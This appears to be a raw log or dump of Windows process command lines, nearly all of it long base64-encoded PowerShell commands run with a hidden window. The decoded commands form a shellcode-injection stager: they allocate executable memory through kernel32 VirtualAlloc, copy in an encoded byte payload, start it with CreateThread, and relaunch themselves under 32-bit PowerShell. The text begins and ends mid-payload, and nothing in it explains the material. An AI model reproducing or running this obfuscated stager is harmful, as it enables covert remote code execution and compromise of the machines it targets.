B4ADYAMwAsADAAeABhADYALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA3ADQALAAwAHgAYwA3ACwAMAB4AGEAZgAsADAAeAAzAGYALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAMwA0ACwAMAB4AGYANgAsADAAeABmADcALAAwAHgAOQA4ACwAMAB4ADEAOQAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA4ADkALAAwAHgAOAA4ACwAMAB4AGYAMQAsADAAeABkADgALAAwAHgAYgBlACwAMAB4ADMAOQAsADAAeABiAGYALAAwAHgAMwBlACwAMAB4AGYAMAAsADAAeABiAGEALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAA5ADMALAAwAHgAMwA4ACwAMAB4AGUAZgAsADAAeAA1ADYALAAwAHgANwAzACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAYQBiACwAMAB4ADcAMgAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADQAMQAsADAAeAAyADYALAAwAHgAMQBlACwAMAB4ADIAOQAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADIAYgAsADAAeAA2ADcALAAwAHgAYwBiACwAMAB4ADUAYwAsADAAeAA2ADcALAAwAHgANgA5ACwAMAB4ADQAYgAsADAAeAA4ADAALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADQAYQAsADAAeABkADMALAAwAHgANQBjACwAMAB4ADkAOQAsADAAeAA5AGYALAAwAHgANgBmACwAMAB4AGQANQAsADAAeAA4ADEALAAwAHgAZgBjACwAMAB4ADQAYQAsADAAeABhAGMALAAwAHgAMwBhACwAMAB4ADMANgAsADAAeAAyADAALAAwAHgAMgBmACwAMAB4AGUAYgAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADgAMwAsADAAeABkADIALAAwAHgAYQA2ACwAMAB4ADMAOAAsADAAeABkAGEALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABhADMALAAwAHgAYQA5ACwAMAB4ADYAZAAsADAAeAA3ADIALAAwAHgANQBlACwAMAB4AGEAOQAsADAAeABhADkALAAwAHgAMAA4ACwAMAB4ADgANAAsADAAeAAzAGMALAAwAHgAMgBhACwAMAB4AGEAYQAsADAAeAA0AGYALAAwAHgAZQA2ACwAMAB4ADkANgAsADAAeAA0AGEALAAwAHgAOAAzACwAMAB4ADcAMAAsADAAeAA1AGMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAMwBhACwAMAB4ADQANQAsADAAeAA2AGYALAAwAHgAZAA0ACwAMAB4ADMAMAAsADAAeAA3ADEALAAwAHgAZQA0ACwAMAB4AGQAYgAsADAAeAA5ADYALAAwAHgAZgAzACwAMAB4AGIAZQAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA2ADQALAAwAHgAOQBlACwAMAB4ADYAMwAsADAAeAAwADUALAAwAHgAYwBiACwAMAB4ADkAZgAsADAAeAA3ADQALAAwAHgAZQA2ACwAMAB4AGIANAAsADAAeAAwADUALAAwAHgAZgBlACwAMAB4ADAAYgAsADAAeABhADAALAAwAHgAMwA0ACwAMAB4ADUAZAAsADAAeAA0ADQALAAwAHgAMAA1ACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgAOQA0ACwAMAB4ADAAMQAsADAAeAAwAGYALAAwAHgAMgBkACwAMAB4AGEANgAsADAAeAA4AGUALAAwAHgAYgBiACwAMAB4AGIAOQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4ADYANQAsADAAeAAzAGQALAAwAHgAZQBjACwAMAB4ADcAZAAsADAAeABkADEALAAwAHgAZAAxACwAMAB4ADEAMwAsADAAeAA3AGUALAAwAHgAMgAxACwAMAB4AGYAYgAsADAAeABkADcALAAwAHgAMgBhACwAMAB4ADcAMQAsADAAeAA5ADMALAAwAHgAZgBlACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgANgAzACwAMAB4AGYAZQAsADAAeAA4ADYALAAwAHgAOABjACwAMAB4ADMAMwAsADAAeAA1ADAALAAwAHgANwA5ACwAMAB4ADYAYwAsADAAeABlADQALAAwAHgAMQAwACwAMAB4ADIAOQAsADAAeAAwADQALAAwAHgAZQBlACwAMAB4ADkAZQAsADAAeAAxADYALAAwAHgAMwA0ACwAMAB4ADEAMQAsADAAeAA3ADUALAAwAHgAMwBmACwAMAB4ADUAYwAsADAAeABlADUALAAwAHgANwA2ACwAMAB4ADQAMAAsADAAeAA5AGMALAAwAHgAOABlACwAMAB4ADEAMwAsADAAeAAzADMALAAwAHgAZQA4ACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADMALAAwAHgAMgBjACwAMAB4AGUAMgAsADAAeAAxAGIALAAwAHgAZQAyACwAMAB4ADgANwAsADAAeABkADYALAAwAHgANQBiACwAMAB4ADAAYgAsADAAeAAwADIALAAwAHgAOQBkACwAMAB4ADEAYgAsADAAeABlADgALAAwAHgAYwA3ACwAMAB4AGEAOAAsADAAeABjAGIALAAwAHgANwA4ACwAMAB4ADEAYQAsADAAeABhAGQALAAwAHgAZQBiACwAMAB4ADIAOAAsADAAeAA5ADMALAAwAHgANABiACwAMAB4ADgAMQAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGMANAAsADAAeAAzAGQALAAwAHgANAAwACwAMAB4ADUAYwAsADAAeAA5AGUALAAwAHgAZABjACwAMAB4ADgAZAAsADAAeAA0AGEALAAwAHgAZABhACwAMAB4AGQAZQAsADAAeAAwADYALAAwAHgANwA5ACwAMAB4ADEAYQAsADAAeAA5ADAALAAwAHgAZQBlACwAMAB4AGYANAAsADAAeAAwADgALAAwAHgANAA0ACwAMAB4ADEAZgAsADAAeAA0ADMALAAwAHgANwAyACwAMAB4AGMAMgAsADAAeAAyADAALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABlAGEALAAwAHgAYgA0ACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgAYgBkACwAMAB4ADIAMAAsADAAeAA4ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABlAGUALAAwAHgANwA2ACwAMAB4AGQAOAAsADAAeAA4ADIALAAwAHgAMgA3ACwAMAB4AGUAMwAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADQANwAsADAAeABlADMALAAwAHgAMgAzACwAMAB4AGYAYwAsADAAeAAxADEALAAwAHgANgA5ACwAMAB4ADIANAAsADAAeAA5ADQALAAwAHgAYwA1ACwAMAB4AGMAOQAsADAAeAA3ADcALAAwAHgAOAAxACwAMAB4ADAAOQAsADAAeABjADQALAAwAHgAZQBiACwAMAB4ADEAYQAsADAAeAA5AGMALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABjAGYALAAwAHgAMwA3ACwAMAB4ADgAMAAsADAAeAA2ADMALAAwAHgAMwA2ACwAMAB4ADcAZgAsADAAeAAwAGYALAAwAHgAOQBiACwAMAB4ADEAZAAsADAAeAA4ADEALAAwAHgANwAzACwAMAB4ADQAYQAsADAAeAA1AGIALAAwAHgAZgA3ACwAMAB4ADkAZAAsADAAeAA0AGUAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEYAZQBTAE4APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEYAZQBTAE4ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEYAZQBTAE4ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABTADIAaQApACkAOwAkAFAARwBwAFcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAA5AFYATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAA5AFYATQAgACQAUABHAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABQAEcAcABXACAAJABlACIAOwB9AA==

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -window hidden -EncodedCommand JABTADIAaQAgAD0AIAAnACQAbgBmAEkAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAbgBmAEkAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBlACwAMAB4ADMAMQAsADAAeABkAGQALAAwAHgAOABiACwAMAB4ADIANAAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANABjACwAMAB4ADMAMQAsADAAeAA3ADAALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABjADAALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAA3ADAALAAwAHgAMQAxACwAMAB4AGUAMgAsADAAeABjADQALAAwAHgAMgAxACwAMAB4ADYAMwAsADAAeABhADYALAAwAHgAMgA2ACwAMAB4AGQAYQAsADAAeAA3ADQALAAwAHgAYwA3ACwAMAB4AGEAZgAsADAAeAAzAGYALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAMwA0ACwAMAB4AGYANgAsADAAeABmADcALAAwAHgAOQA4ACwAMAB4ADEAOQAsADAAeABmAGIALAAwAHgANwBjACwAMAB4AGMAYwAsADAAeAA4ADkALAAwAHgAOAA4ACwAMAB4AGYAMQAsADAAeABkADgALAAwAHgAYgBlACwAMAB4ADMAOQAsADAAeABiAGYALAAwAHgAMwBlACwAMAB4AGYAMAAsADAAeABiAGEALAAwAHgAZQBjACwAMAB4ADAAMgAsADAAeAA5ADMALAAwAHgAMwA4ACwAMAB4AGUAZgAsADAAeAA1ADYALAAwAHgANwAzACwAMAB4ADAAMAAsADAAeAAyADAALAAwAHgAYQBiACwAMAB4ADcAMgAsADAAeAA0ADUALAAwAHgANQBkACwAMAB4ADQAMQAsADAAeAAyADYALAAwAHgAMQBlACwAMAB4ADIAOQAsADAAeABmADcALAAwAHgAZAA3ACwAMAB4ADIAYgAsADAAeAA2ADcALAAwAHgAYwBiACwAMAB4ADUAYwAsADAAeAA2ADcALAAwAHgANgA5ACwAMAB4ADQAYgAsADAAeAA4ADAALAAwAHgAMwAwACwAMAB4ADgAOAAsADAAeAA3AGEALAAwAHgAMQA3ACwAMAB4ADQAYQAsADAAeABkADMALAAwAHgANQBjACwAMAB4ADkAOQAsADAAeAA5AGYALAAwAHgANgBmACwAMAB4AGQANQAsADAAeAA4ADEALAAwAHgAZgBjACwAMAB4ADQAYQAsADAAeABhAGMALAAwAHgAMwBhACwAMAB4ADMANgAsADAAeAAyADAALAAwAHgAMgBmACwAMAB4AGUAYgAsADAAeAAwADYALAAwAHgAYwA5ACwAMAB4ADgAMwAsADAAeABkADIALAAwAHgAYQA2ACwAMAB4ADMAOAAsADAAeABkAGEALAAwAHgAMQAzACwAMAB4ADAAMAAsADAAeABhADMALAAwAHgAYQA5ACwAMAB4ADYAZAAsADAAeAA3ADIALAAwAHgANQBlACwAMAB4AGEAOQAsADAAeABhADkALAAwAHgAMAA4ACwAMAB4ADgANAAsADAAeAAzAGMALAAwAHgAMgBhACwAMAB4AGEAYQAsADAAeAA0AGYALAAwAHgAZQA2ACwAMAB4ADkANgAsADAAeAA0AGEALAAwAHgAOAAzACwAMAB4ADcAMAAsADAAeAA1AGMALAAwAHgANAAwACwAMAB4ADYAOAAsADAAeABmADcALAAwAHgAMwBhACwAMAB4ADQANQAsADAAeAA2AGYALAAwAHgAZAA0ACwAMAB4ADMAMAAsADAAeAA3ADEALAAwAHgAZQA0ACwAMAB4AGQAYgAsADAAeAA5ADYALAAwAHgAZgAzACwAMAB4AGIAZQAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADUAZgAsADAAeAA2ADQALAAwAHgAOQBlACwAMAB4ADYAMwAsADAAeAAwADUALAAwAHgAYwBiACwAMAB4ADkAZgAsADAAeAA3ADQALAAwAHgAZQA2ACwAMAB4AGIANAAsADAAeAAwADUALAAwAHgAZgBlACwAMAB4ADAAYgAsADAAeABhADAALAAwAHgAMwA0ACwAMAB4ADUAZAAsADAAeAA0ADQALAAwAHgAMAA1ACwAMAB4ADcANAAsADAAeAA1AGUALAAwAHgAOQA0ACwAMAB4ADAAMQAsADAAeAAwAGYALAAwAHgAMgBkACwAMAB4AGEANgAsADAAeAA4AGUALAAwAHgAYgBiACwAMAB4AGIAOQAsADAAeAA4AGEALAAwAHgANAA3ACwAMAB4ADYANQAsADAAeAAzAGQALAAwAHgAZQBjACwAMAB4ADcAZAAsADAAeABkADEALAAwAHgAZAAxACwAMAB4ADEAMwAsADAAeAA3AGUALAAwAHgAMgAxACwAMAB4AGYAYgAsADAAeABkADcALAAwAHgAMgBhACwAMAB4ADcAMQAsADAAeAA5ADMALAAwAHgAZgBlACwAMAB4ADUAMgAsADAAeAAxAGEALAAwAHgANgAzACwAMAB4AGYAZQAsADAAeAA4ADYALAAwAHgAOABjACwAMAB4ADMAMwAsADAAeAA1ADAALAAwAHgANwA5ACwAMAB4ADYAYwAsADAAeABlADQALAAwAHgAMQAwACwAMAB4ADIAOQAsADAAeAAwADQALAAwAHgAZQBlACwAMAB4ADkAZQAsADAAeAAxADYALAAwAHgAMwA0ACwAMAB4ADEAMQAsADAAeAA3ADUALAAwAHgAMwBmACwAMAB4ADUAYwAsADAAeABlADUALAAwAHgANwA2ACwAMAB4ADQAMAAsADAAeAA5AGMALAAwAHgAOABlACwAMAB4ADEAMwAsADAAeAAzADMALAAwAHgAZQA4ACwAMAB4ADAAMwAsADAAeABiADkALAAwAHgAOQBkACwAMAB4ADcAMwAsADAAeABiADMALAAwAHgAMgBjACwAMAB4AGUAMgAsADAAeAAxAGIALAAwAHgAZQAyACwAMAB4ADgANwAsADAAeABkADYALAAwAHgANQBiACwAMAB4ADAAYgAsADAAeAAwADIALAAwAHgAOQBkACwAMAB4ADEAYgAsADAAeABlADgALAAwAHgAYwA3ACwAMAB4AGEAOAAsADAAeABjAGIALAAwAHgANwA4ACwAMAB4ADEAYQAsADAAeABhAGQALAAwAHgAZQBiACwAMAB4ADIAOAAsADAAeAA5ADMALAAwAHgANABiACwAMAB4ADgAMQAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGMANAAsADAAeAAzAGQALAAwAHgANAAwACwAMAB4ADUAYwAsADAAeAA5AGUALAAwAHgAZABjACwAMAB4ADgAZAAsADAAeAA0AGEALAAwAHgAZABhACwAMAB4AGQAZQAsADAAeAAwADYALAAwAHgANwA5ACwAMAB4ADEAYQAsADAAeAA5ADAALAAwAHgAZQBlACwAMAB4AGYANAAsADAAeAAwADgALAAwAHgANAA0ACwAMAB4ADEAZgAsADAAeAA0ADMALAAwAHgANwAyACwAMAB4AGMAMgAsADAAeAAyADAALAAwAHgANwA5ACwAMAB4ADEAOQAsADAAeABlAGEALAAwAHgAYgA0ACwAMAB4ADgANgAsADAAeAA4ADgALAAwAHgAYgBkACwAMAB4ADIAMAAsADAAeAA4ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABlAGUALAAwAHgANwA2ACwAMAB4AGQAOAAsADAAeAA4ADIALAAwAHgAMgA3ACwAMAB4AGUAMwAsADAAeABhADMALAAwAHgAZgBjACwAMAB4ADQANwAsADAAeABlADMALAAwAHgAMgAzACwAMAB4AGYAYwAsADAAeAAxADEALAAwAHgANgA5ACwAMAB4ADIANAAsADAAeAA5ADQALAAwAHgAYwA1ACwAMAB4AGMAOQAsADAAeAA3ADcALAAwAHgAOAAxACwAMAB4ADAAOQAsADAAeABjADQALAAwAHgAZQBiACwAMAB4ADEAYQAsADAAeAA5AGMALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABjAGYALAAwAHgAMwA3ACwAMAB4ADgAMAAsADAAeAA2ADMALAAwAHgAMwA2ACwAMAB4ADcAZgAsADAAeAAwAGYALAAwAHgAOQBiACwAMAB4ADEAZAAsADAAeAA4ADEALAAwAHgANwAzACwAMAB4ADQAYQAsADAAeAA1AGIALAAwAHgAZgA3ACwAMAB4ADkAZAAsADAAeAA0AGUAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAEYAZQBTAE4APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEYAZQBTAE4ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAEYAZQBTAE4ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABTADIAaQApACkAOwAkAFAARwBwAFcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJAA5AFYATQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAA5AFYATQAgACQAUABHAHAAVwAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABQAEcAcABXACAAJABlACIAOwB9AA==

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JABuAGYASQAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAG4AZgBJACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAzADEALAAwAHgAZABkACwAMAB4ADgAYgAsADAAeAAyADQALAAwAHgAZABhACwAMAB4AGQAYgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYwAsADAAeAAzADEALAAwAHgANwAwACwAMAB4ADEANQAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAwADMALAAwAHgANwAwACwAMAB4ADEAMQAsADAAeABlADIALAAwAHgAYwA0ACwAMAB4ADIAMQAsADAAeAA2ADMALAAwAHgAYQA2ACwAMAB4ADIANgAsADAAeABkAGEALAAwAHgANwA0ACwAMAB4AGMANwAsADAAeABhAGYALAAwAHgAMwBmACwAMAB4ADQANQAsADAAeABjADcALAAwAHgAYwBiACwAMAB4ADMANAAsADAAeABmADYALAAwAHgAZgA3ACwAMAB4ADkAOAAsADAAeAAxADkALAAwAHgAZgBiACwAMAB4ADcAYwAsADAAeABjAGMALAAwAHgAOAA5ACwAMAB4ADgAOAAsADAAeABmADEALAAwAHgAZAA4ACwAMAB4AGIAZQAsADAAeAAzADkALAAwAHgAYgBmACwAMAB4ADMAZQAsADAAeABmADAALAAwAHgAYgBhACwAMAB4AGUAYwAsADAAeAAwADIALAAwAHgAOQAzACwAMAB4ADMAOAAsADAAeABlAGYALAAwAHgANQA2ACwAMAB4ADcAMwAsADAAeAAwADAALAAwAHgAMgAwACwAMAB4AGEAYgAsADAAeAA3ADIALAAwAHgANAA1ACwAMAB4ADUAZAAsADAAeAA0ADEALAAwAHgAMgA2ACwAMAB4ADEAZQAsADAAeAAyADkALAAwAHgAZgA3ACwAMAB4AGQANwAsADAAeAAyAGIALAAwAHgANgA3ACwAMAB4AGMAYgAsADAAeAA1AGMALAAwAHgANgA3ACwAMAB4ADYAOQAsADAAeAA0AGIALAAwAHgAOAAwACwAMAB4ADMAMAAsADAAeAA4ADgALAAwAHgANwBhACwAMAB4ADEANwAsADAAeAA0AGEALAAwAHgAZAAzACwAMAB4ADUAYwAsADAAeAA5ADkALAAwAHgAOQBmACwAMAB4ADYAZgAsADAAeABkADUALAAwAHgAOAAxACwAMAB4AGYAYwAsADAAeAA0AGEALAAwAHgAYQBjACwAMAB4ADMAYQAsADAAeAAzADYALAAwAHgAMgAwACwAMAB4ADIAZgAsADAAeABlAGIALAAwAHgAMAA2ACwAMAB4AGMAOQAsADAAeAA4ADMALAAwAHgAZAAyACwAMAB4AGEANgAsADAAeAAzADgALAAwAHgAZABhACwAMAB4ADEAMwAsADAAeAAwADAALAAwAHgAYQAzACwAMAB4AGEAOQAsADAAeAA2AGQALAAwAHgANwAyACwAMAB4ADUAZQAsADAAeABhADkALAAwAHgAYQA5ACwAMAB4ADAAOAAsADAAeAA4ADQALAAwAHgAMwBjACwAMAB4ADIAYQAsADAAeABhAGEALAAwAHgANABmACwAMAB4AGUANgAsADAAeAA5ADYALAAwAHgANABhACwAMAB4ADgAMwAsADAAeAA3ADAALAAwAHgANQBjACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAZgA3ACwAMAB4ADMAYQAsADAAeAA0ADUALAAwAHgANgBmACwAMAB4AGQANAAsADAAeAAzADAALAAwAHgANwAxACwAMAB4AGUANAAsADAAeABkAGIALAAwAHgAOQA2ACwAMAB4AGYAMwAsADAAeABiAGUALAAwAHgAZgBmACwAMAB4ADMAMgAsADAAeAA1AGYALAAwAHgANgA0ACwAMAB4ADkAZQAsADAAeAA2ADMALAAwAHgAMAA1ACwAMAB4AGMAYgAsADAAeAA5AGYALAAwAHgANwA0ACwAMAB4AGUANgAsADAAeABiADQALAAwAHgAMAA1ACwAMAB4AGYAZQAsADAAeAAwAGIALAAwAHgAYQAwACwAMAB4ADMANAAsADAAeAA1AG